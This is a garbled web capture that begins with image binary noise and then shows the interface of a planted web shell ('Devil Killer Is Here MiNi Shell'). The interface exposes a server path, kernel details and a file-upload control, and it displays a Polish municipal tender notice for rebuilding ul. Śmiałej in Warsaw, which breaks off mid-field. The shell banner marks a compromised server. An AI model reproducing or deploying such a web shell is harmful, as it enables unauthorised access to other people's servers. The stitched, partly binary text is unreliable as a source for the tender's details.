JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031207003-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ul. Śmiałej na odc. od ul. gen. J. Zajączka do al. Wojska Polskiego w ramach zadania inwestycyjnego pn. ,,Przebudowa ul. Śmiałej na odc. od ul. gen. J. Zajączka do ul. Hauke-Bosaka–ETAP I&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa Dzielnica Żoliborz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525966300186</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 6/8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-627</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Zoliborz.WZP@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zoliborz.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ul. Śmiałej na odc. od ul. gen. J. Zajączka do al. Wojska Polskiego w ramach zadania inwestycyjnego pn. ,,Przebudowa ul. Śmiałej na odc. od ul. gen. J. Zajączka do ul. Hauke-Bosaka–ETAP I&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-808913cf-599c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312070</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001288/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Przebudowa ul. Śmiałej na odc. od ul. gen. Zajączka do al. Wojska Polskiego w ramach zadania inwestycyjnego pn. „Przebudowa ul. Śmiałej na odc. od ul. gen. Zajączka do ul. Hauke Bosaka- ETAP I”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej z wykorzystaniem Systemu Zakupowego Miasta Stołecznego Warszawy. Korzystanie z Systemu przez Wykonawców jest bezpłatne.<br/>1)	Aby złożyć ofertę w postępowaniu Wykonawca jest zobowiązany do dokonania rejestracji w Systemie Zakupowym Miasta Stołecznego Warszawy dostępnym pod adresem: https://zamowienia.um.warszawa.pl<br/>System Zakupowy Miasta Stołecznego Warszawy jest zintegrowany z platformą OnePlace Operatora Systemu. Zamawiający informuje, że przy pierwszym logowaniu się Wykonawców do Sytemu, konieczne jest przejście przez ścieżkę rejestracji do strefy dostawców OnePlace. Rejestracja Wykonawcy w Systemie następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. Zamawiający zaleca dokonanie rejestracji bez zbędnej zwłoki ponieważ proces weryfikacji Wykonawcy może potrwać do 2 dni roboczych. <br/>2)	Szczegółowe informacje dotyczące sposobu rejestracji i logowania do Systemu, znajdują się Instrukcjach dla Wykonawcy na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury procesu zakupowego” pod adresem: https://zamowienia.um.warszawa.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;clientName=umw&amp;USER_MENU_HOVER=publicFilesList<br/>3)	Po zarejestrowaniu i zalogowaniu się do Systemu Wykonawca uzyska dostęp do aplikacji umożliwiającej składanie wniosków, ofert i zadawanie pytań w postępowaniu. Komunikacja pomiędzy Wykonawcami a Zamawiającym będzie odbywała się za pomocą funkcjonalności Systemu. System umożliwia między innymi dokonywanie czynności złożenia oferty, wycofania oferty, złożenia pytań itd. <br/>4)	Za datę złożenia oferty, wniosków, zawiadomienia, dokumentu elektronicznego, oświadczenia lub elektronicznej kopii dokumentu lub oświadczenia, przyjmuje się datę przekazania (złożenia) w Systemie Zakupowym Miasta Stołecznego Warszawy do Zamawiającego. Moment złożenia oferty następuje wraz z zakończeniem procesu składania, tj. po kliknięciu przycisku „Złóż wniosek”/”Złóż ofertę”, elektronicznym podpisaniu formularza wniosku/oferty i wyświetleniu przez system komunikatu „Oferta złożona poprawnie”. W sekcji „Podsumowanie” na formularzu ofertowym wyświetli się dokładna data i godzina złożenia wniosku/oferty w polu „Data”.<br/>5)	Kodowanie i czas odbioru danych:<br/>a)	plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>b)	oznaczenie czasu odbioru danych przez System stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>6)	Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>b)	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>c)	zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>d)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Szczegółowe informacje wskazane są w Instrukcjach dla Wykonawcy dostępnych na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury procesu zakupowego” pod adresem: https://zamowienia.um.warszawa.pl/servlet/HomeServlet?MP_module=main&amp;MP_action=publicFilesList&amp;clientName=umw&amp;USER_MENU_HOVER=publicFilesList<br/>7)	Instrukcje dla Wykonawców, dotyczące składania ofert/wniosków, składania dokumentów elektronicznych, oświadczeń, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu Systemu, znajdują na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury procesu zakupowego”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że w związku ze stosowaniem<br/>procedury przeprowadzenia postępowania o udzielenie zamówienia publicznego przetwarza dane<br/>osobowe przekazane przez Wykonawców ubiegających się o udzielenie zamówienia publicznego. 2.<br/>Dane osobowe, które znalazły się w posiadaniu Zamawiającego w wyniku prowadzenia postępowania są<br/>przetwarzane w celu wykonania czynności związanych z przeprowadzeniem postępowania, realizacją<br/>umowy o udzielenie zamówienia publicznego oraz realizacją obowiązków ustawowych określonych w<br/>obowiązujących przepisach prawa.3. Wykonawca ubiegający się o udzielenie zamówienia publicznego<br/>będzie zobowiązany do przekazania Zamawiającemu danych osobowych osób, które zostaną wskazane<br/>do wykonania czynności związanych z realizacją umowy oraz danych kontaktowych umożliwiających<br/>wypełnienie przez Zamawiającego obowiązku informacyjnego, o którym mowa w art. 13 ust. 1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016, str. 1),<br/>dalej „RODO”.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Z uwagi na regulacje ustawy Pzp oraz cel gromadzenia i<br/>przetwarzania danych osobowych nie przysługuje Pani/Panu: a) prawo do przenoszenia danych<br/>osobowych o którym mowa w art. 20 RODO; b) prawo do usunięcia danych osobowych, w związku z<br/>art.17 ust. 3 lit. b, d lub e RODO; c) prawo sprzeciwu, wobec przetwarzania danych osobowych na<br/>podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. Na podstawie art. 19 ust. 4 ustawy Pzp informuję, że: a) skorzystanie przez osobę<br/>,której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/>postanowień umowyw sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp; b) w<br/>postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w<br/>art. 18 ust. 1RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-XVIII-WZP.271.36.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2805593,71 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia w ramach zadania inwestycyjnego przebudowy ul. Śmiałej na ww. odcinku, obejmuje:<br/><br/>1.	Roboty drogowe, w tym: <br/>1.1. rozbiórka istniejących nawierzchni bitumicznych, z kostki i płyt betonowych wraz z istniejącymi podbudowami, obramowań typu krawężniki, obrzeża itp.,<br/>1.2.	roboty ziemne polegające na korytowaniu pod warstwy konstrukcyjne jezdni, chodników, zjazdów i zatok postojowych.<br/>1.3.	konstrukcje projektowanych nawierzchni drogowych wraz z podbudowami:<br/>a)	jezdni bitumicznej: <br/>- warstwa ścieralna z betonu asfaltowego gr. 4 cm.<br/>- warstwa wiążąca z betonu asfaltowego gr. 8 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 na powierzchni E2 ≥ 50 MPa gr. 20 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementemC3/4 na powierzchni E2 ≥ 50 MPa gr. 20 cm,<br/>- warstwa odcinająca z kruszywa naturalnego o uziarnieniu 0/31,5 (pospółki) gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥50 MPa;<br/>a)	jezdni z kostki kamiennej przy skwerze L. Bergera ,,Goliata”:<br/>- warstwa ścieralna z kostki kamiennej granitowej 8/11 z rozbiórki istniejących nawierzchni, uzupełniona<br/>- nową kostką 8/11 (wszystkie boki), granit jasnoszary fugowana,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 gr. 20 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementemC3/4 gr. 20 cm,<br/>- warstwa odcinająca z kruszywa naturalnego o uziarnieniu 0/31,5 (pospółki) gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥50 MPa;<br/>a)	chodników i wysp-azyli:<br/>- warstwa ścieralna z betonowych płyt chodnikowych 35x35 koloru szarego gr. 6 cm (układana z infułą),<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 gr. 15 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementem C3/4 na powierzchni E2≥100 MPa gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥50 MPa;<br/>a)	zatok postojowych:<br/>- warstwa ścieralna z kostki kamiennej 8/11 (wszystkie boki) surowo łupana granit jasnoszary, fugowana,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 gr. 20 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementem C3/4 na powierzchni E2&gt;100 MPa gr. 15 cm,<br/>- warstwa odcinająca z kruszywa naturalnego o uziarnieniu 0/31,5 (pospółki) gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥ 50 MPa.<br/><br/>a)	zjazdów:<br/>- warstwa ścieralna z kostki kamiennej 8/11 cm (wszystkie boki), cięta groszkowana,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 gr. 20 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementem C3/4 na powierzchni E2≥100 MPa gr. 10 cm,<br/>- warstwa odcinająca z kruszywa naturalnego o uziarnieniu 0/31,5 (pospółki) gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥ 50 MPa;<br/>a)	opasek:<br/>- warstwa ścieralna z kostki kamiennej 4/6 cm fugowana, granit jasnoszary,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm;<br/>a)	progów zwalniających, listwowych U-16a:<br/>- warstwa ścieralna z kostki kamiennej 8/11 cm koloru czerwonego, fugowanej,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- warstwa profilowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 gr. zmienna 6 - 13 cm,<br/>- podbudowa z mieszanki niezwiązanej C90/3 o uziarnieniu 0/31,5 na powierzchni E2 ≥ 50 MPa gr. 20 cm,<br/>- warstwa mrozoodporna z mieszanki związanej cementem C3/4 na powierzchni E2 ≥ 50 MPa gr. 20 cm,<br/>- warstwa odcinająca z kruszywa naturalnego o uziarnieniu 0/31,5 (pospółki) gr. 10 cm,<br/>- wyprofilowany i zagęszczony grunt rodzimy, na powierzchni E2≥50 MPa;<br/>a)	ścieku ulicznego szerokości 30 cm:<br/>- kostka rzędowa granitowa cięta 10x10x20 cm,<br/>- podsypka cementowo-piaskowa 1:4 gr. 3-5 cm;<br/>a)	krawężników wystających:<br/>- krawężniki granitowe 20x30 cm,<br/>- podsypka cementowo-piaskowa 1:4 gr. 5 cm,<br/>- ława betonowa C 12/15 F=0,1975 m2;<br/>a)	krawężników wtopionych:<br/>- krawężniki granitowe 20 x25 cm,<br/>- podsypka cementowo-piaskowa 1:4 gr. 5 cm,<br/>- ława betonowa C 12/15 F=0,1975 m2;<br/>a)	oporników na szerokości przejścia dla pieszych:<br/>- opornik granitowy 20 x30 cm ułożony na płask,<br/>- podsypka cementowo-piaskowa 1:4 gr. 5 cm,<br/>-	ława betonowa C 12/15 F=0,1975 m2;<br/>a)	obrzeży:<br/>- granitowe 6x25 cm,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm,<br/>- ława betonowa C 12/15 F=0,065 m2;<br/>a)	przejść dla pieszych/jezdni:<br/>- trzy rzędy granitowych płytek dotykowych 25x25 cm,<br/>- podsypka cementowo-piaskowa 1:4 gr. 4 cm;<br/><br/>1.4. wdrożenie nowego oznakowania pionowego i poziomego zgodnie z projektem stałej organizacji ruchu nr ZR/762/21,<br/><br/>2.	Roboty odwodnieniowe, w tym:<br/>2.1.	montaż wpustów betonowych prefabrykowanych o średnicy 0,5 m z osadnikiem i wpustem żeliwnym klasy D400 – 14 kpl,<br/>2.2.	montaż syfonów z kształtek z kamionki o gładkiej powierzchni wewnętrznej średnicy 200 mm – 14 szt.<br/>2.3.	montaż rur kamionkowych średnicy 0,20 m – 62,00 m.<br/>2.4.	montaż rur kamionkowych średnicy 0,30 m – 44,00 m.<br/>2.5.	montaż studni betonowej o średnicy wewnętrznej 1,2 m i włazem o nośności 40 ton – klasy D400,<br/>2.6.	podłączenie projektowanych wpustów poprzez przykanaliki odwodnieniowe do istniejącego kanału ogólnospławnego z rur kamionkowych fi 0,3 m w ul. Śmiałej;<br/><br/>3.	Roboty oświetleniowe, w tym:<br/>3.1. demontaż istniejących latarni oświetleniowych wraz z oprzyrządowaniem,<br/>3.2. odrestaurowanie latarni oświetleniowych typu Pastorał i ponowny montaż w nowych lokalizacjach,<br/>3.3. budowa odcinka linii oświetlenia ulicznego typu YKY 5x25mm2 od istniejącego słupa oświetleniowego nr 20151 zlokalizowanego przy ul. gen. J. Zajączka do projektowanych słupów oświetleniowych typu Pastorał Warszawski SPP/B/7/1 zlokalizowanych w ul. Śmiałej,<br/>3.4. ustawienie nowych słupów oświetleniowych typu Pastorał Warszawski SPP/B/7/1 – 3 szt.,<br/><br/>4.	Roboty zieleniarskie, w tym:<br/>4.1. nasadzenia drzew, krzewów, bylin i żywopłotów:<br/>- drzew - 12 szt.<br/>- krzewów form naturalnych – 163 szt.,<br/>- krzew żywopłotowych form naturalnych – 446 szt.,<br/>- roślin bylinowych – 42 szt.,<br/>- żywopłotów – 494 szt.,<br/>- krzewów okrywowych – 1274 szt.,<br/>- bylin form naturalnych – 199 szt.,<br/>4.2. odmłodzenie starszych drzew - 59 szt.,<br/>4.3. pielęgnacja drzew liściastych z trzyletnim okresem gwarancyjnym – 12 szt.,<br/>4.4. pielęgnacja krzewów żywopłotowych w okresie gwarancyjnym – 2082,00 m2,<br/>4.5. wykonanie nowych trawników oraz renowacja zniszczonych (2 215,98m2);<br/>4.6. roboty pielęgnacyjne dotyczące:<br/>a)	trawników:<br/>-	co najmniej 6 krotne koszenie trawników w okresie gwarancyjnym; prace nie mogą być prowadzone w godzinach ciszy nocnej, tj. od godz. 22 do 6 i przy użyciu dmuchaw spalinowych; terminy koszenia trawników wymagają uzgodnienia z Zamawiającym,<br/>-	nawożenie nawozami mineralnymi i wykonywanie dosiewek w miejscach nieprawidłowego wzrostu trawy, a także w miejscach zdewastowanych przez użytkowników drogi,<br/>-	interwencyjne podlewanie trawników w uzgodnieniu z Zamawiającym;<br/>b)	drzew, krzewów i żywopłotów:<br/>-	wykonywanie cięć pielęgnacyjnych korygujących korony drzew oraz zapewniających właściwy rozrost krzewów i żywopłotów,<br/>-	cięcia techniczne dla odsłonięcia znaków drogowych i dla zachowania skrajni drogowej,<br/>	wymiana i naprawa palikowania drzew,<br/>-	pielenie mis przy drzewach i rabat z krzewami oraz żywopłotami przy założeniu, że tego typu prace wykonuje się minimum 5-6 razy w sezonie,<br/>-	interwencyjne podlewanie drzew, krzewów i żywopłotów w okresie temperatur mogących skutkować uschnięciem nasadzeń, w uzgodnieniu z Zamawiającym,<br/>-	nawożenie nawozami mineralnymi drzew, krzewów i żywopłotów,<br/>-	uzupełnianie ściółkowania mis i rabat korą z drzew iglastych do 5cm,<br/>-	wymiana podłoża w miejscach nasadzeń w razie potrzeby, <br/>-	wycinanie samosiewów,<br/>-	opryski ochronne nasadzeń,<br/>-	wiosenne i jesienne grabienie liści (w cenie należy uwzględnić dodatkowe grabienie w okresie opadania liści).<br/><br/><br/>5.	Prace dotyczące małej architektury:<br/>5.1. montaż ławek parkowych z oparciem (2 szt.), <br/>5.2 montaż koszy na śmieci (2 szt.), <br/>5.3. montaż stojaków rowerowych (12 szt.).<br/><br/><br/><br/>W związku z art. 91 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129, z późn. zm.), informuję, że zamówienie na: przebudowę ul. Śmiałej na odc. od ul. gen. Zajączka do al. Wojska Polskiego w ramach zadania inwestycyjnego <br/>pn. „Przebudowa ul. Śmiałej na odc. od ul. gen. Zajączka do ul. Hauke Bosaka - ETAP I” <br/>nie zostało podzielone na części, gdyż jest to proste zamówienie. Podział tego zamówienia przyczyniłby się do nadmiernych trudności technicznych związanych z koordynacją działań różnych wykonawców realizujących poszczególne części zamówienia i mógłby poważnie zagrozić właściwemu wykonaniu zamówienia a także prowadziłby do zwiększenia kosztów realizacji zamówienia, co skutkowałoby nieracjonalnym wydatkowaniem środków publicznych naruszającym ustawę o finansach publicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</span></h3> <h3 class="mb-0">4.2.7.) 